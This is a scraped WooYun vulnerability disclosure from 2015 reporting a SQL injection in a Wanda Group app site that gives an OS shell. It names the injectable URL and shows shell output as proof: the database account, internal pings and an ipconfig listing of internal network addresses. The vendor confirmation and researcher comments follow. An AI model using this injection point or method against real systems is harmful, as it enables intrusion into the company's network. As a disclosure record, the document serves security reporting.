万达集团app云端主站SQL注入os-shell | wooyun-2015-0152935| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0152935

漏洞标题：万达集团app云端主站SQL注入os-shell

漏洞作者： zzR

提交时间：2015-11-09 10:09

修复时间：2015-12-24 17:48

公开时间：2015-12-24 17:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-09：细节已通知厂商并且等待厂商处理中
2015-11-09：厂商已经确认，细节仅向厂商公开
2015-11-19：细节向核心白帽子及相关领域专家公开
2015-11-29：细节向普通白帽子公开
2015-12-09：细节向实习白帽子公开
2015-12-24：细节向公众公开

简要描述：

万达集团官方app云端主站sql注入，shell，可通ww.wanda.cn/www.wandafilm.com/www.baidu.com。
另外，老板，再来两个月会员！

详细说明：

万达集团app 官方ios版
信息泄露的同时，存在sql注入，可shell，可通www.wanda.cn/www.wandafilm.com/www.baidu.com
http://app.wanda.cn/KidsReport/OA/RevenueDailydlYueReport.aspx?cpname=%E5%8C%85%E5%A4%B4%E4%B9%90%E5%9B%AD&datee=2015%E5%B9%B402%E6%9C%88
注入链接
http://app.wanda.cn/KidsReport/OATest/RevenueDailydlYueReport.aspx?cpname=%E5%8C%85%E5%A4%B4%E4%B9%90%E5%9B%AD&datee=2015%E5%B9%B402%E6%9C%88 (GET)

漏洞证明：

os-shell 内网地址可通官网，电影院线官网

command standard output:    'wanda\kids_dbadmin'
command standard output:
---
正在 Ping www.wanda.cn [10.199.130.155] 具有 32 字节的数据:
来自 10.199.130.155 的回复: 字节=32 时间=1ms TTL=248
来自 10.199.130.155 的回复: 字节=32 时间=2ms TTL=248
来自 10.199.130.155 的回复: 字节=32 时间=2ms TTL=248
来自 10.199.130.155 的回复: 字节=32 时间=2ms TTL=248
 
10.199.130.155 的 Ping 统计信息:
 \?a0\?a0\?a0数据包: 已发送 = 4，已接收 = 4，丢失 = 0 (0% 丢失)，
往返行程的估计时间(以毫秒为单位):
 \?a0\?a0\?a0最短 = 1ms，最长 = 2ms，平均 = 1ms
 
 
正在 Ping www.wanda.cn [10.199.130.155] 具有 32 字节的数据:
来自 10.199.130.155 的回复: 字节=32 时间=1ms TTL=248
来自 10.199.130.155 的回复: 字节=32 时间=2ms TTL=248
来自 10.199.130.155 的回复: 字节=32 时间=1ms TTL=248
来自 10.199.130.155 的回复: 字节=32 时间=2ms TTL=248
---
command standard output:
---
正在 Ping www.wandafilm.com [10.199.1.2] 具有 32 字节的数据:
来自 10.199.1.2 的回复: 字节=32 时间=2ms TTL=248
来自 10.199.1.2 的回复: 字节=32 时间=2ms TTL=248
来自 10.199.1.2 的回复: 字节=32 时间=6ms TTL=248
来自 10.199.1.2 的回复: 字节=32 时间=2ms TTL=248
 
10.199.1.2 的 Ping 统计信息:
 \?a0\?a0\?a0数据包: 已发送 = 4，已接收 = 4，丢失 = 0 (0% 丢失)，
往返行程的估计时间(以毫秒为单位):
 \?a0\?a0\?a0最短 = 2ms，最长 = 6ms，平均 = 3ms
 
 
正在 Ping www.wandafilm.com [10.199.1.2] 具有 32 字节的数据:
来自 10.199.1.2 的回复: 字节=32 时间=5ms TTL=248
来自 10.199.1.2 的回复: 字节=32 时间=4ms TTL=248
来自 10.199.1.2 的回复: 字节=32 时间=7ms TTL=248
来自 10.199.1.2 的回复: 字节=32 时间=2ms TTL=248
---
command standard output:
---
正在 Ping www.a.shifen.com [220.181.111.188] 具有 32 字节的数据:
来自 220.181.111.188 的回复: 字节=32 时间=10ms TTL=50
来自 220.181.111.188 的回复: 字节=32 时间=10ms TTL=50
来自 220.181.111.188 的回复: 字节=32 时间=10ms TTL=50
来自 220.181.111.188 的回复: 字节=32 时间=10ms TTL=50
 
220.181.111.188 的 Ping 统计信息:
 \?a0\?a0\?a0数据包: 已发送 = 4，已接收 = 4，丢失 = 0 (0% 丢失)，
往返行程的估计时间(以毫秒为单位):
 \?a0\?a0\?a0最短 = 10ms，最长 = 10ms，平均 = 10ms
 
 
正在 Ping www.a.shifen.com [220.181.111.188] 具有 32 字节的数据:
来自 220.181.111.188 的回复: 字节=32 时间=10ms TTL=50
来自 220.181.111.188 的回复: 字节=32 时间=10ms TTL=50
来自 220.181.111.188 的回复: 字节=32 时间=10ms TTL=50
来自 220.181.111.188 的回复: 字节=32 时间=10ms TTL=50
---
command standard output:
---
Windows IP 配置
 
 
以太网适配器 本地连接* 9:
 
 \?a0\?a0连接特定的 DNS 后缀 . . . . . . . : 
 \?a0\?a0本地链接 IPv6 地址. . . . . . . . : fe80::b1b2:aa4c:f308:dd89 
 \?a0\?a0IPv4 地址 . . . . . . . . . . . . : 169.254.1.154
 \?a0\?a0子网掩码 \?a0. . . . . . . . . . . . : 255.255.0.0
 \?a0\?a0默认网关. . . . . . . . . . . . . : 
 
以太网适配器 本地连接 5:
 
 \?a0\?a0连接特定的 DNS 后缀 . . . . . . . : 
 \?a0\?a0本地链接 IPv6 地址. . . . . . . . : fe80::c82d:3567:7d0b:21b2
 \?a0\?a0IPv4 地址 . . . . . . . . . . . . : 10.199.180.12
 \?a0\?a0子网掩码 \?a0. . . . . . . . . . . . : 255.255.255.0
 \?a0\?a0IPv4 地址 . . . . . . . . . . . . : 10.199.180.14
 \?a0\?a0子网掩码 \?a0. . . . . . . . . . . . : 255.255.255.0
 \?a0\?a0IPv4 地址 . . . . . . . . . . . . : 10.199.180.15
 \?a0\?a0子网掩码 \?a0. . . . . . . . . . . . : 255.255.255.0
 \?a0\?a0默认网关. . . . . . . . . . . . . : 10.199.180.1
 
以太网适配器 HB1:
 
 \?a0\?a0连接特定的 DNS 后缀 . . . . . . . : 
 \?a0\?a0IPv4 地址 . . . . . . . . . . . . : 192.168.1.1
 \?a0\?a0子网掩码 \?a0. . . . . . . . . . . . : 255.255.255.0
 \?a0\?a0默认网关. . . . . . . . . . . . . : 
 
以太网适配器 HB2:
 
 \?a0\?a0连接特定的 DNS 后缀 . . . . . . . : 
 \?a0\?a0IPv4 地址 . . . . . . . . . . . . : 192.168.2.1
 \?a0\?a0子网掩码 \?a0. . . . . . . . . . . . : 255.255.255.0
 \?a0\?a0默认网关. . . . . . . . . . . . . : 
 
隧道适配器 isatap.{72186596-9C5E-43BB-AC30-E420B6F901C8}:
 
 \?a0\?a0媒体状态 \?a0. . . . . . . . . . . . : 媒体已断开
 \?a0\?a0连接特定的 DNS 后缀 . . . . . . . : 
 
隧道适配器 isatap.{62A2B96C-184C-4BA7-AD3B-722F260213D7}:
 
 \?a0\?a0媒体状态 \?a0. . . . . . . . . . . . : 媒体已断开
 \?a0\?a0连接特定的 DNS 后缀 . . . . . . . : 
 
隧道适配器 isatap.{2F03E182-FE26-4B21-9D46-9829730077B9}:
 
 \?a0\?a0媒体状态 \?a0. . . . . . . . . . . . : 媒体已断开
 \?a0\?a0连接特定的 DNS 后缀 . . . . . . . : 
 
隧道适配器 isatap.{E3573A4C-D91D-4EF5-BFA8-93F73AA45A3F}:
 
 \?a0\?a0媒体状态 \?a0. . . . . . . . . . . . : 媒体已断开
 \?a0\?a0连接特定的 DNS 后缀 . . . . . . . : 
 
隧道适配器 Teredo Tunneling Pseudo-Interface:
 
 \?a0\?a0媒体状态 \?a0. . . . . . . . . . . . : 媒体已断开
 \?a0\?a0连接特定的 DNS 后缀 . . . . . . . : 
 
 
Windows IP 配置
 
 
以太网适配器 本地连接* 9:
 
 \?a0\?a0连接特定的 DNS 后缀 . . . . . . . : 
 \?a0\?a0本地链接 IPv6 地址. . . . . . . . : fe80::b1b2:aa4c:f308:dd89 
 \?a0\?a0IPv4 地址 . . . . . . . . . . . . : 169.254.1.154
 \?a0\?a0子网掩码 \?a0. . . . . . . . . . . . : 255.255.0.0
 \?a0\?a0默认网关. . . . . . . . . . . . . : 
 
以太网适配器 本地连接 5:
 
 \?a0\?a0连接特定的 DNS 后缀 . . . . . . . : 
 \?a0\?a0本地链接 IPv6 地址. . . . . . . . : fe80::c82d:35

网卡也不少，不深入了

修复方案：

你的月亮我的心

版权声明：转载请注明来源 zzR@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2015-11-09 17:46

厂商回复：

感谢zzR同学的关注与贡献，马上通知业务整改。

漏洞评价：

2015-11-09 10:18 | 爱上平顶山 ( 核心白帽子 | Rank:2882 漏洞数:576 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)

不会是那个吧？
2015-11-09 10:19 | 胡小树 ( 实习白帽子 | Rank:64 漏洞数:12 | 我是一颗小小树)

屌屌屌，
2015-11-09 10:22 | zzR ( 核心白帽子 | Rank:1394 漏洞数:123 | 收wb 1：5 无限量收 [平台担保])

@爱上平顶山是，饥不则路了已经，会员过期了有点捉急
2015-11-09 10:24 | 带馅儿馒头 ( 核心白帽子 | Rank:1312 漏洞数:147 | 心在，梦在)

@zzR 我老公准备聘请你当万达超级安全顾问 /
2015-11-09 10:29 | 高小厨 ( 普通白帽子 | Rank:874 漏洞数:79 | 不会吹牛的小二不是好厨子！)

哎呀，万达忠实粉丝啊
2015-11-09 11:02 | zzR ( 核心白帽子 | Rank:1394 漏洞数:123 | 收wb 1：5 无限量收 [平台担保])

@带馅儿馒头不知道我干爹有没有这么个意愿-0-
2015-11-09 11:04 | 白非白 ( 普通白帽子 | Rank:455 漏洞数:62 | ♫ Freedom - Anthony Hamilton ♫)

现在还有礼物发么
2015-11-09 11:06 | zzR ( 核心白帽子 | Rank:1394 漏洞数:123 | 收wb 1：5 无限量收 [平台担保])

@白非白不造啊
2015-11-09 11:09 | zzR ( 核心白帽子 | Rank:1394 漏洞数:123 | 收wb 1：5 无限量收 [平台担保])

@高小厨粉丝你好

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0152935

漏洞标题：万达集团app云端主站SQL注入os-shell

相关厂商：大连万达集团股份有限公司

漏洞作者： zzR

提交时间：2015-11-09 10:09

修复时间：2015-12-24 17:48

公开时间：2015-12-24 17:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 zzR@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0152935

漏洞标题：万达集团app云端主站SQL注入os-shell

相关厂商：大连万达集团股份有限公司

漏洞作者： zzR

提交时间：2015-11-09 10:09

修复时间：2015-12-24 17:48

公开时间：2015-12-24 17:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0152935"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 zzR@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：